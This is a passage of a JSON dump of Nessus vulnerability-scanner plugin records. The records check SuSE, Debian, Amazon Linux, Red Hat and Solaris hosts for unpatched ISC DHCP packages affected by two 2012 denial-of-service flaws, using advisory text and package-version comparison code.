Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"dhcp-3.0.7-7.17.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"dhcp-client-3.0.7-7.17.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"dhcp-3.0.7-7.17.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"dhcp-client-3.0.7-7.17.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"dhcp-devel-3.0.7-7.17.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"dhcp-relay-3.0.7-7.17.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"dhcp-server-3.0.7-7.17.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-12T09:47:34", "description": "Two security vulnerabilities affecting ISC dhcpd, a server for\nautomatic IP address assignment, in Debian have been discovered.\n\n - CVE-2012-3571\n Markus Hietava of the Codenomicon CROSS project\n discovered that it is possible to force the server to\n enter an infinite loop via messages with malformed\n client identifiers.\n\n - CVE-2012-3954\n Glen Eustace discovered that DHCP servers running in\n DHCPv6 mode and possibly DHCPv4 mode suffer of memory\n leaks while processing messages. An attacker can use\n this flaw to exhaust resources and perform denial of\n service attacks.", "edition": 16, "published": "2012-07-30T00:00:00", "title": "Debian DSA-2516-1 : isc-dhcp - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3954", "CVE-2012-3571"], "modified": "2012-07-30T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "p-cpe:/a:debian:debian_linux:isc-dhcp"], "id": "DEBIAN_DSA-2516.NASL", "href": "https://www.tenable.com/plugins/nessus/60142", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2516. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(60142);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-3571\", \"CVE-2012-3954\");\n script_bugtraq_id(54665);\n script_xref(name:\"DSA\", value:\"2516\");\n\n script_name(english:\"Debian DSA-2516-1 : isc-dhcp - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Two security vulnerabilities affecting ISC dhcpd, a server for\nautomatic IP address assignment, in Debian have been discovered.\n\n - CVE-2012-3571\n Markus Hietava of the Codenomicon CROSS project\n discovered that it is possible to force the server to\n enter an infinite loop via messages with malformed\n client identifiers.\n\n - CVE-2012-3954\n Glen Eustace discovered that DHCP servers running in\n DHCPv6 mode and possibly DHCPv4 mode suffer of memory\n leaks while processing messages. An attacker can use\n this flaw to exhaust resources and perform denial of\n service attacks.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-3571\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-3954\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/isc-dhcp\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2012/dsa-2516\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the isc-dhcp packages.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 4.1.1-P1-15+squeeze4.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:isc-dhcp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/07/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/07/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"dhcp3-client\", reference:\"4.1.1-P1-15+squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"dhcp3-common\", reference:\"4.1.1-P1-15+squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"dhcp3-dev\", reference:\"4.1.1-P1-15+squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"dhcp3-relay\", reference:\"4.1.1-P1-15+squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"dhcp3-server\", reference:\"4.1.1-P1-15+squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"isc-dhcp-client\", reference:\"4.1.1-P1-15+squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"isc-dhcp-client-dbg\", reference:\"4.1.1-P1-15+squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"isc-dhcp-client-udeb\", reference:\"4.1.1-P1-15+squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"isc-dhcp-common\", reference:\"4.1.1-P1-15+squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"isc-dhcp-dev\", reference:\"4.1.1-P1-15+squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"isc-dhcp-relay\", reference:\"4.1.1-P1-15+squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"isc-dhcp-relay-dbg\", reference:\"4.1.1-P1-15+squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"isc-dhcp-server\", reference:\"4.1.1-P1-15+squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"isc-dhcp-server-dbg\", reference:\"4.1.1-P1-15+squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"isc-dhcp-server-ldap\", reference:\"4.1.1-P1-15+squeeze4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-04-01T01:22:18", "description": "A denial of service flaw was found in the way the dhcpd daemon handled\nzero-length client identifiers. A remote attacker could use this flaw\nto send a specially crafted request to dhcpd, possibly causing it to\nenter an infinite loop and consume an excessive amount of CPU time.\n(CVE-2012-3571)\n\nTwo memory leak flaws were found in the dhcpd daemon. A remote\nattacker could use these flaws to cause dhcpd to exhaust all available\nmemory by sending a large number of DHCP requests. (CVE-2012-3954)", "edition": 26, "published": "2013-09-04T00:00:00", "title": "Amazon Linux AMI : dhcp (ALAS-2012-115)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3954", "CVE-2012-3571"], "modified": "2021-04-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:dhclient", "p-cpe:/a:amazon:linux:dhcp", "p-cpe:/a:amazon:linux:dhcp-debuginfo", "p-cpe:/a:amazon:linux:dhcp-devel", "p-cpe:/a:amazon:linux:dhcp-common", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2012-115.NASL", "href": "https://www.tenable.com/plugins/nessus/69605", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2012-115.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69605);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/04/18 15:09:34\");\n\n script_cve_id(\"CVE-2012-3571\", \"CVE-2012-3954\");\n script_xref(name:\"ALAS\", value:\"2012-115\");\n script_xref(name:\"RHSA\", value:\"2012:1141\");\n\n script_name(english:\"Amazon Linux AMI : dhcp (ALAS-2012-115)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A denial of service flaw was found in the way the dhcpd daemon handled\nzero-length client identifiers. A remote attacker could use this flaw\nto send a specially crafted request to dhcpd, possibly causing it to\nenter an infinite loop and consume an excessive amount of CPU time.\n(CVE-2012-3571)\n\nTwo memory leak flaws were found in the dhcpd daemon. A remote\nattacker could use these flaws to cause dhcpd to exhaust all available\nmemory by sending a large number of DHCP requests. (CVE-2012-3954)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2012-115.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update dhcp' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:dhclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:dhcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:dhcp-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:dhcp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:dhcp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/08/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"dhclient-4.1.1-31.P1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"dhcp-4.1.1-31.P1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"dhcp-common-4.1.1-31.P1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"dhcp-debuginfo-4.1.1-31.P1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"dhcp-devel-4.1.1-31.P1.17.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dhclient / dhcp / dhcp-common / dhcp-debuginfo / dhcp-devel\");\n}\n", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-17T13:11:01", "description": "Updated dhcp packages that fix three security issues are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that\nallows individual devices on an IP network to get their own network\nconfiguration information, including an IP address, a subnet mask, and\na broadcast address.\n\nA denial of service flaw was found in the way the dhcpd daemon handled\nzero-length client identifiers. A remote attacker could use this flaw\nto send a specially crafted request to dhcpd, possibly causing it to\nenter an infinite loop and consume an excessive amount of CPU time.\n(CVE-2012-3571)\n\nTwo memory leak flaws were found in the dhcpd daemon. A remote\nattacker could use these flaws to cause dhcpd to exhaust all available\nmemory by sending a large number of DHCP requests. (CVE-2012-3954)\n\nUpstream acknowledges Markus Hietava of the Codenomicon CROSS project\nas the original reporter of CVE-2012-3571, and Glen Eustace of Massey\nUniversity, New Zealand, as the original reporter of CVE-2012-3954.\n\nUsers of DHCP should upgrade to these updated packages, which contain\nbackported patches to correct these issues. After installing this\nupdate, all DHCP servers will be restarted automatically.", "edition": 25, "published": "2012-08-03T00:00:00", "title": "RHEL 6 : dhcp (RHSA-2012:1141)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3954", "CVE-2012-3571"], "modified": "2012-08-03T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:dhcp-common", "cpe:/o:redhat:enterprise_linux:6.3", "p-cpe:/a:redhat:enterprise_linux:dhclient", "p-cpe:/a:redhat:enterprise_linux:dhcp-devel", "p-cpe:/a:redhat:enterprise_linux:dhcp-debuginfo", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:dhcp"], "id": "REDHAT-RHSA-2012-1141.NASL", "href": "https://www.tenable.com/plugins/nessus/61405", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:1141. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61405);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-3571\", \"CVE-2012-3954\");\n script_bugtraq_id(54665);\n script_xref(name:\"RHSA\", value:\"2012:1141\");\n\n script_name(english:\"RHEL 6 : dhcp (RHSA-2012:1141)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated dhcp packages that fix three security issues are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that\nallows individual devices on an IP network to get their own network\nconfiguration information, including an IP address, a subnet mask, and\na broadcast address.\n\nA denial of service flaw was found in the way the dhcpd daemon handled\nzero-length client identifiers. A remote attacker could use this flaw\nto send a specially crafted request to dhcpd, possibly causing it to\nenter an infinite loop and consume an excessive amount of CPU time.\n(CVE-2012-3571)\n\nTwo memory leak flaws were found in the dhcpd daemon. A remote\nattacker could use these flaws to cause dhcpd to exhaust all available\nmemory by sending a large number of DHCP requests. (CVE-2012-3954)\n\nUpstream acknowledges Markus Hietava of the Codenomicon CROSS project\nas the original reporter of CVE-2012-3571, and Glen Eustace of Massey\nUniversity, New Zealand, as the original reporter of CVE-2012-3954.\n\nUsers of DHCP should upgrade to these updated packages, which contain\nbackported patches to correct these issues. After installing this\nupdate, all DHCP servers will be restarted automatically.\"\n );\n # http://www.isc.org/software/dhcp/advisories/cve-2012-3571\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4aa887c5\"\n );\n # http://www.isc.org/software/dhcp/advisories/cve-2012-3954\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?764622e9\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:1141\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3571\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3954\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dhclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dhcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dhcp-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dhcp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dhcp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/07/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/08/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:1141\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"dhclient-4.1.1-31.P1.el6_3.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"dhclient-4.1.1-31.P1.el6_3.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"dhclient-4.1.1-31.P1.el6_3.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"dhcp-4.1.1-31.P1.el6_3.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"dhcp-4.1.1-31.P1.el6_3.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"dhcp-4.1.1-31.P1.el6_3.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"dhcp-common-4.1.1-31.P1.el6_3.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"dhcp-common-4.1.1-31.P1.el6_3.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"dhcp-common-4.1.1-31.P1.el6_3.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"dhcp-debuginfo-4.1.1-31.P1.el6_3.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"dhcp-devel-4.1.1-31.P1.el6_3.1\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dhclient / dhcp / dhcp-common / dhcp-debuginfo / dhcp-devel\");\n }\n}\n", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-17T14:01:00", "description": "The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - ISC DHCP 4.1.2 through 4.2.4 and 4.1-ESV before\n 4.1-ESV-R6 allows remote attackers to cause a denial of\n service (infinite loop and CPU consumption) via a\n malformed client identifier. (CVE-2012-3571)\n\n - Multiple memory leaks in ISC DHCP 4.1.x and 4.2.x before\n 4.2.4-P1 and 4.1-ESV before 4.1-ESV-R6 allow remote\n attackers to cause a denial of service (memory\n consumption) by sending many requests. (CVE-2012-3954)", "edition": 24, "published": "2015-01-19T00:00:00", "title": "Oracle Solaris Third-Party Patch Update : isc-dhcp (multiple_denial_of_service_dos4)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3954", "CVE-2012-3571"], "modified": "2015-01-19T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:isc-dhcp", "cpe:/o:oracle:solaris:11.0"], "id": "SOLARIS11_ISC-DHCP_20120821.NASL", "href": "https://www.tenable.com/plugins/nessus/80647", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Oracle Third Party software advisories.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80647);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-3571\", \"CVE-2012-3954\");\n\n script_name(english:\"Oracle Solaris Third-Party Patch Update : isc-dhcp (multiple_denial_of_service_dos4)\");\n script_summary(english:\"Check for the 'entire' version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Solaris system is missing a security patch for third-party\nsoftware.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - ISC DHCP 4.1.2 through 4.2.4 and 4.1-ESV before\n 4.1-ESV-R6 allows remote attackers to cause a denial of\n service (infinite loop and CPU consumption) via a\n malformed client identifier. (CVE-2012-3571)\n\n - Multiple memory leaks in ISC DHCP 4.1.x and 4.2.x before\n 4.2.4-P1 and 4.1-ESV before 4.1-ESV-R6 allow remote\n attackers to cause a denial of service (memory\n consumption) by sending many requests. (CVE-2012-3954)\"\n );\n # https://www.oracle.com/technetwork/topics/security/thirdparty-patch-map-1482893.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4a913f44\"\n );\n # https://blogs.oracle.com/sunsecurity/multiple-denial-of-service-dos-vulnerabilities-in-isc-dhcp\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ee6701ed\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Solaris 11/11 SRU 10.5.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:11.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:isc-dhcp\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/08/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris11/release\", \"Host/Solaris11/pkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Solaris11/release\");\nif (isnull(release)) audit(AUDIT_OS_NOT, \"Solaris11\");\npkg_list = solaris_pkg_list_leaves();\nif (isnull (pkg_list)) audit(AUDIT_PACKAGE_LIST_MISSING, \"Solaris pkg-list packages\");\n\nif (empty_or_null(egrep(string:pkg_list, pattern:\"^isc-dhcp$\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"isc-dhcp\");\n\nflag = 0;\n\nif (solaris_check_release(release:\"0.5.11-0.175.0.10.0.5.0\", sru:\"SRU 10.5a\") > 0) flag++;\n\nif (flag)\n{\n error_extra = 'Affected package : isc-dhcp\\n' + solaris_get_report2();\n error_extra = ereg_replace(pattern:\"version\", replace:\"OS version\", string:error_extra);\n if (report_verbosity > 0) security_warning(port:0, extra:error_extra);\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_PACKAGE_NOT_AFFECTED, \"isc-dhcp\");\n", "cvss": {"score": 6.1, "vector": 